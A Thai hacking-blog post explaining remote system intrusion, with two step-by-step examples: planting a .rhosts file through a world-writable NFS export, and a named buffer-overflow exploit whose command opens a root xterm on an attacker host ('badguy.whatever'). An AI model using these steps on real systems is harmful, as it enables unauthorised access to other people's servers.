ป้ายเลื่อน


WelCom To www.Kiss-Hack.blogspot.com สังคม IT สังคม Hacker

หมวดหมู่

วันอาทิตย์ที่ 20 ตุลาคม พ.ศ. 2556

การ Hack ด้วย Remote Exploit




        เหมือนผมจะเคยอธิบายเกี่ยวกับการ Hack โดยอาศัย Exploit มาแล้วแต่จำไม่ได้ว่า อธิบายให้ใครฟัง (ก็คงจะเป็นพวกที่เรียนคอร์ด Hack นั้นละ) ในการ hack นั้นเรา ต้องการจะ Hack เว็บใครซักเว็บ อันดับแรกเราต้องรู้ว่า Exploit เว็บนั้นคืออะไร ถ้าเป็น CMS ฟรี สามารถหาโหลดตาม Google มานั่งแกะหา ช่องโหว่ดู ถ้าขี้เกียจหน่อยก็จะค้นเอาใน Google ในบทความนี้ก็จะอธิบาย การเจาะระบบด้วย Remote นั้นเป็นยังไง พวก RCE ( Remote Code Exploit )

อะไรคือการเจาะระบบแบบ remote ?

การเจาะระบบแบบ remote เกิดขึ้นเมื่อคุณโจมตีเซิร์ฟเวอร์ที่คุณไม่ได้ล๊อกอินเข้าไป โดยโจมตีจากเซิร์ฟเวอร์อื่น ถึงแม้ว่าในบางกรณีคุณสามารถโจมตีจากเครื่องพีซีทั่ว ๆ ไป (ขึ้นอยู่กับระบบปฏิบัติการ)
การเดาแอกเคาท์ของยูสเซอร์และรหัสผ่าน (ยกเว้นแต่ว่ามีแอกเคาท์ guest) ในระบบอื่นไม่ถือว่าเป็นการเจาะแบบ remote เราจะสมมุติว่า คุณไม่รู้ชื่อแอกเคาท์และรหัสผ่านในระบบอื่น
การ เจาะระบบแบบ remote แบ่งเป็นสองประเภท โดยมักจะเป็นการเจาะโดยอาศัยช่องโหว่ที่มีในเซอร์วิสที่กำลังรันอยู่ใน เซิร์ฟเวอร์ที่ตกเป็นเหยื่อ (ที่มีการกำหนดค่าระบบไม่ถูกต้องหรือยอมให้มีการเข้าถึงมากเกินไป การ export NFS (network file system) mount แบบ read/write ให้ทุกคนสามารถเข้าถึงได้อาจไม่ใช่สิ่งที่ไม่เลวร้าย แต่ถ้าคุณสามารถ NFS mount ไดเร็กทอรีที่มีไฟล์ .rhosts ได้เป็นสิ่งที่เลวร้ายมาก นอกจากนี้ daemon ที่รันอยู่บางชนิดอาจมีปัญหาที่อาจถูกโจมตีแบบ buffer overflow แบบ remote ได้ ยอมให้ใครบางคนจากเซิร์ฟเวอร์อื่นสามารถใช้คำสั่งในเครื่องที่ตกเป็นเป้า หมายได้ตามต้องการ
ต่อไปนี้เป็นตัวอย่างสองตัวอย่างด้วยกัน
- คุณเป็น root ในเครื่องที่ชื่อว่า badguy
- คุณค้นพบว่าโฮสต์เป้าหมาย export /home2/old เป็นแบบ read/write ให้ทุกคนสามารถเข้าถึงได้
- คุณใช้คำสั่ง finger ไปยังแอกเคาท์ต่าง ๆ แล้วพบว่า home directory ของยูสเซฮร์ fred คือ /home2/old/fred เขาไม่ได้ log in หลายเดือนแล้ว
- คุณสร้างแอกเคาท์ fred ในเครื่อง badguy ทันที
- แล้วคุณจึง mount /home2/old ในเครื่องเป้าหมาย แล้วสร้างไฟล์ .rhosts เพื่อให้เครื่องที่ตกเป็นเหยื่อเชื่อถือเครื่อง badguy
- หลังจากที่คุณเป็นยูสเซอร์ fred ในเครื่อง badguy คุณจึงเชื่อมต่อแบบ rlogin ไปยังเครื่องเป้าหมายโดยเป็นยูสเซอร์ fred
ต่อไปนี้เป็นตัวอย่างการโจมตีโดยอาศัย buffer overflow
- โฮสต์ที่เป็นเป้าหมายกำลังรัน named
- คุณได้เขียน exploit ที่เกี่ยวกับ named ที่ยอมให้คุณสามารถส่งคำสั่งได้ตามต้องการผ่าน named daemon ซึ่งใช้เทคนิค buffer overflow คุณคอมไพล์มันและตั้งชื่อว่า sploit
- คุณพิมพ์ว่า: sploit victim.nmrc.org "/usr/X11R6/bin/xterm -display badguy.whatever:0"
- มีวินโดวส์ปรากฏขึ้นที่จอเทอร์มินัลของคุณที่กำลังรันเป็น root อยู่ที่ victim.nmrc.org


ข้อมูล infosec.sran.org